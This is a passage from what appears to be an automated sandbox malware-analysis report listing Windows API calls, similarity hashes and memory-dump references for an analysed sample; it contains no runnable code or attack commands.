                                                                                            • GetACP.KERNEL32(?,?,00000001,00000000,0047CC8B,?,-0000001A,0047EBEA,-00000010,?,00000004,0000001A,00000000,0047EF37,?,0045D288), ref: 0047CA22
                                                                                              • Part of subcall function 0042E244: 73A0A570.USER32(00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000,0047F8E7,?,?,?,?,?,0049719A), ref: 0042E253
                                                                                              • Part of subcall function 0042E244: EnumFontsA.GDI32(?,00000000,0042E230,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E27E
                                                                                              • Part of subcall function 0042E244: 73A0A480.USER32(00000000,?,0042E2A3,00000000,00000000,0042E29C,?,00000000,00000000,0047EF9E,?,?,00000001,00000000,00000002,00000000), ref: 0042E296
                                                                                            • SendNotifyMessageA.USER32(00010440,00000496,00002711,-00000001), ref: 0047CBF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: A480A570EnumFontsMessageNotifySend
                                                                                            • String ID:
                                                                                            • API String ID: 2685184028-0
                                                                                            • Opcode ID: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
                                                                                            • Instruction ID: fce8b5d73ed99f1e2ef66d4a8ce886950ac346dadb3b378a3b6f7676f451f25a
                                                                                            • Opcode Fuzzy Hash: f68c4743a9de9405453e6a0390fbdfcde8eff5ac8737c06096cd16648cf5d8d5
                                                                                            • Instruction Fuzzy Hash: 585172346001048BC720EF26E9C668B3799EB54309B50C57FB8489B7A7C73CED468B9E
                                                                                            APIs
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DB64
                                                                                            • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DC60), ref: 0042DBD4
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: QueryValue
                                                                                            • String ID:
                                                                                            • API String ID: 3660427363-0
                                                                                            • Opcode ID: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                                            • Instruction ID: dfb8c8f379aef3e71039058fa16673b54f7d2a66c5b8750361213b9ce9dda202
                                                                                            • Opcode Fuzzy Hash: f6dee5a1b0912d590274e0c641160928bd3a3525fab59aba2a017e3bac49ea5e
                                                                                            • Instruction Fuzzy Hash: E6416371E04129AFDB11DF96D881BAFB7B8EB44704F91846AE800F7244D778EE00DB95
                                                                                            APIs
                                                                                            • RegEnumKeyExA.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DE94
                                                                                            • RegCloseKey.ADVAPI32(?,0042DF05,?,00000000,00000000,00000000,00000000,00000000,0042DEFE,?,?,00000008,00000000,00000000,0042DF2B), ref: 0042DEF8
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CloseEnum
                                                                                            • String ID:
                                                                                            • API String ID: 2818636725-0
                                                                                            • Opcode ID: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
                                                                                            • Instruction ID: 371203d48d58dd12687a59eda9429109c9bfccb849147f5bab4b3e409d052118
                                                                                            • Opcode Fuzzy Hash: c20ec2cbd5f7473bb618f7593d98c9f52b2147fe6f3bae42fe9bdb37577d9e65
                                                                                            • Instruction Fuzzy Hash: F431D570F04648AEDB11DFA6DD42BBFBBB8EB49304F91407BE500B7280D6789E01CA19
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,00600000,00002000,00000001,?,?), ref: 0045CF34
                                                                                            • BZ2_bzDecompressInit._ISDECMP(?,00000000,00000000,?,?,?,00000000,00600000,00002000,00000001,?,?), ref: 0045CF7A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocDecompressInitVirtualZ2_bz
                                                                                            • String ID:
                                                                                            • API String ID: 3582128297-0
                                                                                            • Opcode ID: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
                                                                                            • Instruction ID: 1a4503516ee109fc6ad3b2554e9268a8a2595667017840414d64b8ef7de05fed
                                                                                            • Opcode Fuzzy Hash: 939ddee8e7cb809407a1460aba98dbeb0dddb04131a165e363d28bd3e230a3f5
                                                                                            • Instruction Fuzzy Hash: D0110872600700BFD310CF258982B96BBA6FF44751F044127E908D7681E7B9A928CBD8
                                                                                            APIs
                                                                                            • FindResourceA.KERNEL32(00400000,00000000,0000000A), ref: 0040AFF2
                                                                                            • FreeResource.KERNEL32(00000000,00400000,00000000,0000000A,F0E80040,00000000,?,?,0040B14F,00000000,0040B167,?,?,?,00000000), ref: 0040B003
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Resource$FindFree
                                                                                            • String ID:
                                                                                            • API String ID: 4097029671-0
                                                                                            • Opcode ID: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
                                                                                            • Instruction ID: 91321923317e208a88a5ae6d58faa7c91e6d3ee961cd2f37f7af0eb3e2dea987
                                                                                            • Opcode Fuzzy Hash: c217acbb35f958402dd645ed5001c515fa2723f58848c5696583f56f37880200
                                                                                            • Instruction Fuzzy Hash: A401DFB1300604AFD710FF69DC92E5B77A9DB8A7187118076F500AB6D0DA7AAC1096AD
                                                                                            APIs
                                                                                            • MoveFileA.KERNEL32(00000000,00000000), ref: 00452322
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00452348), ref: 0045232A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorFileLastMove
                                                                                            • String ID:
                                                                                            • API String ID: 55378915-0
                                                                                            • Opcode ID: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
                                                                                            • Instruction ID: cd5642aef6cf07d7f8e9267465b44b1c19008dc4a29441b527747bf004e73304
                                                                                            • Opcode Fuzzy Hash: 835ec9a5b672ab9d24676a9d11d134ae0c37e22a40a15be47d608805de694f62
                                                                                            • Instruction Fuzzy Hash: 0301F971B04744BBCB00DFB99D415AEB7ECDB4932575045BBFC08E3252EA7C5E088598
                                                                                            APIs
                                                                                            • CreateDirectoryA.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E09
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00000000,00451E2F), ref: 00451E11
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateDirectoryErrorLast
                                                                                            • String ID:
                                                                                            • API String ID: 1375471231-0
                                                                                            • Opcode ID: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
                                                                                            • Instruction ID: 865e03444c10a102779f68a5f284ef85491b61924e311ce2fbbb44c68c5af0ec
                                                                                            • Opcode Fuzzy Hash: b7dd327be7f8f9d4ff98a7d49d2b4008869c573d79d3003604c7202f4093979a
                                                                                            • Instruction Fuzzy Hash: 03F0C871A04604ABCB10DF759C4269EB7E8DB49315B5049B7FC04E7652E63D5E088598
                                                                                            APIs
                                                                                            • DeleteFileA.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451F9F
                                                                                            • GetLastError.KERNEL32(00000000,00000000,00451FC5,?,-00000001,?), ref: 00451FA7
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: DeleteErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 2018770650-0
                                                                                            • Opcode ID: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
                                                                                            • Instruction ID: 56c29436b3704a60aac7ef2d45938277689dd37fb147f6dcc6f0601c7006ef02
                                                                                            • Opcode Fuzzy Hash: 3d1044f5e2d2d648e0667ff4a971c8bbcfba219cc637320a536d75e9382e69c7
                                                                                            • Instruction Fuzzy Hash: 59F0C872A04644ABCB00DF75AC416AEB7E8DB4831575149B7FC04E3262E7385E189598
                                                                                            APIs
                                                                                            • GetFileAttributesA.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452179
                                                                                            • GetLastError.KERNEL32(00000000,00000000,0045219F,?,?,00000000), ref: 00452181
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AttributesErrorFileLast
                                                                                            • String ID:
                                                                                            • API String ID: 1799206407-0
                                                                                            • Opcode ID: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                                            • Instruction ID: 62be775e20b856c612f09eeab74c149225b5b58071cf0ad503393caa7686f059
                                                                                            • Opcode Fuzzy Hash: 6d4dbdae4b422f7f8bb4bc8d57743dba2f11a1c7441bfab1e9d389b7cfb9d745
                                                                                            • Instruction Fuzzy Hash: 2BF02870A04B08ABDB10DF759C414AEB3E8EB4572571047B7FC14A3282D7785E088588
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(?,?,00001000,00000004,?,?,0045CEF2), ref: 0045D046
                                                                                            Strings
                                                                                            • bzlib: Too much memory requested, xrefs: 0045D021
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: AllocVirtual
                                                                                            • String ID: bzlib: Too much memory requested
                                                                                            • API String ID: 4275171209-1500031545
                                                                                            • Opcode ID: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
                                                                                            • Instruction ID: abed268314e6f1e5b27342288b91a972118d83a3dc427804377a042ebfa3a805
                                                                                            • Opcode Fuzzy Hash: c63733ee34ed6dcfa19a3ccb32caffce73538764a075bf8867a72a68987aa30e
                                                                                            • Instruction Fuzzy Hash: 87F030327001114BDB6199A988C17DA66D48F8875EF080476AF4CDF28BD6BDDC89C36C
                                                                                            APIs
                                                                                            • LoadCursorA.USER32(00000000,00007F00), ref: 00423259
                                                                                            • LoadCursorA.USER32(00000000,00000000), ref: 00423283
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: CursorLoad
                                                                                            • String ID:
                                                                                            • API String ID: 3238433803-0
                                                                                            • Opcode ID: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                                            • Instruction ID: 4bac6b1dd1e4bc4155aef89283820d70f6b19f6d084946fd63ee35bdac132fa3
                                                                                            • Opcode Fuzzy Hash: f8ffac14a906f8b64a7fc8a6c8ab7a97eb5bbf96c971544edaeb3bf4604a13a0
                                                                                            • Instruction Fuzzy Hash: 0BF05C11700110ABDA105D3E6CC0E2A7268DB82B36B6103BBFE3AD32D1CA2E1D01017D
                                                                                            APIs
                                                                                            • SetErrorMode.KERNEL32(00008000), ref: 0042E2C6
                                                                                            • LoadLibraryA.KERNEL32(00000000,00000000,0042E310,?,00000000,0042E32E,?,00008000), ref: 0042E2F5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLibraryLoadMode
                                                                                            • String ID:
                                                                                            • API String ID: 2987862817-0
                                                                                            • Opcode ID: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
                                                                                            • Instruction ID: 1f7e49cd896e1bdba9cb1c47732ae581670473b421036b970d27c02fb23a5fd1
                                                                                            • Opcode Fuzzy Hash: 99dd2043f999db4e1414a2a3c1f7d5ac1e6fec7ec7d1cd9244d10c1b93de06db
                                                                                            • Instruction Fuzzy Hash: ACF05E70614744BEDB029F679C6282ABAECE74DB1179248BAF800A7691E63D58108928
                                                                                            APIs
                                                                                            • GetClassInfoA.USER32(00400000,?,?), ref: 004162F1
                                                                                            • GetClassInfoA.USER32(00000000,?,?), ref: 00416301
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ClassInfo
                                                                                            • String ID:
                                                                                            • API String ID: 3534257612-0
                                                                                            • Opcode ID: 95fcc31a687e8085c8d51d7c5e8386a7ebbc1e12afa0a833ee919d12e52ce4aa
                                                                                            • Instruction ID: 0adfc10981bdfd058f0d6bb489ac923dd3d4ff6eaebe16c9951958678d3e783c
                                                                                            • Opcode Fuzzy Hash: 95fcc31a687e8085c8d51d7c5e8386a7ebbc1e12afa0a833ee919d12e52ce4aa
                                                                                            • Instruction Fuzzy Hash: 50E01AB26025256AEB10DFA98D81EE32ADCDB09310B120263BE04CA286D764DD009BA8
                                                                                            APIs
                                                                                            • SetFilePointer.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF6E
                                                                                            • GetLastError.KERNEL32(?,00000000,?,00000002,?,?,0046F12D,0000003C,00000000), ref: 0044FF76
                                                                                              • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$FilePointer
                                                                                            • String ID:
                                                                                            • API String ID: 1156039329-0
                                                                                            • Opcode ID: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
                                                                                            • Instruction ID: 1dbdaa83cb3dbbf4f1378df278a55a8d47ec78cb15146b3f417e0b56a3c3e3df
                                                                                            • Opcode Fuzzy Hash: e054c5ccee6c1196755840a7a8baca4f528d5ae0d9a30f87e7f7972c64a6d300
                                                                                            • Instruction Fuzzy Hash: E2E012B13056015BFB00EAA599C1F3B22D8DB49314F10487BB544CF182E674CC098B65
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Global$AllocLock
                                                                                            • String ID:
                                                                                            • API String ID: 15508794-0
                                                                                            • Opcode ID: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                                            • Instruction ID: 0263706b80ae8aebac4b2aeda69df254121a1764ed820e2db5cbcbfbef09bb73
                                                                                            • Opcode Fuzzy Hash: 3aab631d28e9500c64151c0aeb9b91af43aad549cba5a5fa87d1f146672bdb4f
                                                                                            • Instruction Fuzzy Hash: 3D9002C4C10B01A4DC0432B24C0BC3F0C2CD8C072C3C0486F7018B6183883C8800083C
                                                                                            APIs
                                                                                            • VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,004017ED), ref: 00401513
                                                                                            • VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,004017ED), ref: 0040153A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual$AllocFree
                                                                                            • String ID:
                                                                                            • API String ID: 2087232378-0
                                                                                            • Opcode ID: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                                            • Instruction ID: b33c25bc9d44e5855224c25112d8485d4e2e4d0ac397fdc44bd3a0d1e7be2c31
                                                                                            • Opcode Fuzzy Hash: 86d3033056ee1eeb69ed56595d455cb9815cc57517e3e671329daeadf9e1ec36
                                                                                            • Instruction Fuzzy Hash: 3BF08272A0063067EB60596A4C85B5359C49BC5794F154076FD09FF3E9D6B98C0142A9
                                                                                            APIs
                                                                                            • GetSystemDefaultLCID.KERNEL32(00000000,0040871A), ref: 00408603
                                                                                              • Part of subcall function 00406DF4: LoadStringA.USER32(00400000,0000FF87,?,00000400), ref: 00406E11
                                                                                              • Part of subcall function 00408570: GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0049A4C0,00000001,?,0040863B,?,00000000,0040871A), ref: 0040858E
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000001.00000002.3291039179.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000001.00000002.3291012690.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291116404.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291137046.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291162075.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                            • Associated: 00000001.00000002.3291192376.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_1_2_400000_KRdh0OaXqH.jbxd
                                                                                            Similarity
                                                                                            • API ID: DefaultInfoLoadLocaleStringSystem
                                                                                            • String ID:
